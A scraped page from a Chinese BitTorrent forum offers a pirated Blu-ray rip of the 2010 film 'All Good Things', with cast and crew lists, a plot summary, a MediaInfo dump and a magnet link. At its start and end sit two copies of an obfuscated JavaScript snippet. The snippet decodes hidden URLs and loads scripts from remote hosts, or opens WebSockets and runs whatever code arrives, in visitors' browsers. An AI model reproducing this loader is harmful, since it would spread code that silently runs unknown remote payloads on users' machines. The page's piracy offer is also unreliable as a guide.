所有美好的东西[简繁字幕].All.Good.Things.2010.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 10.67GB

版主小s 1月前 239

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 所有美好的东西 / 美丽破绽(台) / 好事不断

◎片 名 All Good Things

◎年 代 2010

◎产 地 美国

◎类 别 剧情 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 2010-11-05(美国视频点播) / 2010-12-03(美国部分上映)

◎IMDb链接 https://www.imdb.com/title/tt1175709/

◎豆瓣评分 6.7/10 (11066人评价)

◎豆瓣链接 https://movie.douban.com/subject/2974280/

◎片 长 101 分钟

◎导 演 安德鲁?亚雷茨基 Andrew Jarecki (id:1305447)

◎编 剧 马库斯·辛奇 Marcus Hinchey (id:1393939)

马克·斯默林 Marc Smerling (id:1305536)

安德鲁?亚雷茨基 Andrew Jarecki (id:1305447)

◎演 员 瑞恩·高斯林 Ryan Gosling (id:1012531)

克斯汀·邓斯特 Kirsten Dunst (id:1054429)

弗兰克·兰格拉 Frank Langella (id:1013816)

莉莉·拉贝 Lily Rabe (id:1315786)

菲利普·贝克·霍尔 Philip Baker Hall (id:1049779)

迈克尔·埃斯佩尔 Michael Esper (id:1335929)

戴安·维诺拉 Diane Venora (id:1157624)

尼克·奥弗曼 Nick Offerman (id:1009365)

克里斯汀·韦格 Kristen Wiig (id:1022588)

史蒂芬·坤肯 Stephen Kunken (id:1390148)

约翰·卡伦 John Cullum (id:1032223)

玛吉·基莉 Maggie Kiley (id:1314606)

利兹·斯托贝尔 Liz Stauber (id:1055424)

玛丽恩·麦科里 Marion McCorry (id:1116569)

米娅·狄龙 Mia Dillon (id:1088390)

翠尼·阿瓦拉多 Trini Alvarado (id:1014026)

汤姆·里斯·法雷尔 Tom Riis Farrell (id:1375348)

Bruce Norris Bruce Norris (id:1133774)

弗朗西斯·斯威夫特 Francie Swift (id:1331302)

大卫·马古利斯 David Margulies (id:1125418)

格伦·弗莱舍尔 Glenn Fleshler (id:1346468)

弗朗西斯·奎南 Francis Guinan (id:1343413)

威廉·杰克森·哈珀 William Jackson Harper (id:1256010)

阿什莉·阿特金森 Ashlie Atkinson (id:1205955)

唐娜·布洛克 Donna Bullock (id:1069962)

Julie Moran Julie Moran (id:1136424)

索科萝·圣地亚哥 Socorro Santiago (id:1137837)

扎布丽娜·格瓦拉 Zabryna Guevara (id:1343660)

兰尼·弗拉哈迪 Lanny Flaherty (id:1080700)

罗伯特·克洛赫赛 Robert Clohessy (id:1070249)

Lázaro Pérez Lázaro Pérez (id:1148438)

米歇尔·赫斯特 Michelle Hurst (id:1332179)

洛拉·帕沙林斯基 Lola Pashalinski (id:1294037)

杰瑞·格雷森 Jerry Grayson (id:1409558)

Tony Torn Tony Torn (id:1299411)

佐伊·利斯特·琼斯 Zoe Lister Jones (id:1049834)

Tristan Comeau (id:1264832)

Amelia Martin Amelia Martin (id:1117099)

马克·斯默林 Marc Smerling (id:1305536)

Jennifer Rogen Jennifer Rogen (id:1305732)

戴维·罗斯布卢姆 David Rosenbloom (id:1296091)

麦克·伦敦 Michael London (id:1290269)

安德鲁?亚雷茨基 Andrew Jarecki (id:1305447)

罗伯·西蒙森 Rob Simonsen (id:1033218)

迈克尔·塞瑞岑 Michael Seresin (id:1009970)

戴维·罗斯布卢姆 David Rosenbloom (id:1296091)

威恩·托马斯 Wynn Thomas (id:1299163)

Michael White Michael White (id:1300816)

朱迪·金 Judy Chin (id:1280574)

Eric Yellin Eric Yellin (id:1276265)

穆费奥托基诺 Murphy Occhino (id:1293464)

Laurent Ben-Mimoun Laurent Ben-Mimoun (id:1301846)

◎标 签 悬疑 / 美国 / RyanGosling / 犯罪 / KirstenDunst / 美国电影 / 2010 / 剧情

◎简 介

影片根据纽约历史上最声名狼藉的谋杀悬案改编。

1973年纽约地产富豪的儿子Robert Durst(瑞恩·高斯林 Ryan Gosling 饰)娶了美丽的穷学生Kathleen McCormack(克斯汀·邓斯特 Kirsten Dunst 饰)。两人婚后离开 城市,到乡村享受了一段恬静的时光,当返程时卡蒂回到了学校继续学业。一切看似幸福,可1982年Kathleen突然失踪寻访不得。2000年Durst的好友Susan Berman被发现死在家中,20年前的失踪案被重新唤起,Durst因这两个案件受到询问,但都因为证据不足而未受起诉。2001年Durst的邻居Morris Black被杀,尸体被分解,他再一次受到怀疑被起诉,可经著名律师辩护后被无罪释放。直到2004年再次接受审判Durst最终被判5年监禁,媒体将"百万富翁凶手"的名号赠予他。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 193610185952055741077254618131009779475 (0x91A7F728CD670FC07CEC3856A96A3713)

  4. Complete name : [email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.7 GiB

  8. Duration : 1 h 41 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.1 Mb/s

  11. Encoded date : UTC 2021-10-17 06:32:12

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 40 min

  21. Bit rate : 10.6 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.213

  31. Stream size : 7.47 GiB (70%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10597 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=145087 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 41 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 998 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.83 GiB (27%)

  58. Title : English DTS-HD Master Audio 5.1 @ 3303 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 41 min

  69. Bit rate mode : Constant

  70. Bit rate : 224 kb/s

  71. Channel(s) : 2 channels

  72. Channel layout : L R

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 162 MiB (1%)

  77. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 1

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : AC-3

  85. Format/Info : Audio Coding 3

  86. Commercial name : Dolby Digital

  87. Codec ID : A_AC3

  88. Duration : 1 h 41 min

  89. Bit rate mode : Constant

  90. Bit rate : 224 kb/s

  91. Channel(s) : 2 channels

  92. Channel layout : L R

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 162 MiB (1%)

  97. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 2

  98. Language : English

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Text #1

  103. ID : 5

  104. Format : PGS

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 38 min

  108. Bit rate : 39.8 kb/s

  109. Count of elements : 2414

  110. Stream size : 28.1 MiB (0%)

  111. Title : Eng/SUP

  112. Language : English

  113. Default : No

  114. Forced : No


  115. Text #2

  116. ID : 6

  117. Format : PGS

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 35 min

  121. Bit rate : 21.2 kb/s

  122. Count of elements : 1732

  123. Stream size : 14.5 MiB (0%)

  124. Title : Chs/SUP 简体

  125. Language : Chinese

  126. Default : Yes

  127. Forced : No


  128. Text #3

  129. ID : 7

  130. Format : PGS

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 35 min

  134. Bit rate : 22.0 kb/s

  135. Count of elements : 1732

  136. Stream size : 15.0 MiB (0%)

  137. Title : Cht/SUP 繁体

  138. Language : Chinese

  139. Default : No

  140. Forced : No


  141. Menu

  142. 00:00:00.000 : en:第 01 章

  143. 00:12:20.156 : en:第 02 章

  144. 00:18:41.203 : en:第 03 章

  145. 00:26:09.485 : en:第 04 章

  146. 00:35:47.812 : en:第 05 章

  147. 00:44:35.965 : en:第 06 章

  148. 00:52:12.838 : en:第 07 章

  149. 01:01:13.044 : en:第 08 章

  150. 01:12:45.152 : en:第 09 章

  151. 01:23:02.686 : en:第 10 章

  152. 01:28:41.316 : en:第 11 章

  153. 01:36:32.745 : en:第 12 章




复制代码


TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:B524B3C2AED2BA29581B3E8F5F39C5971ADB863E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};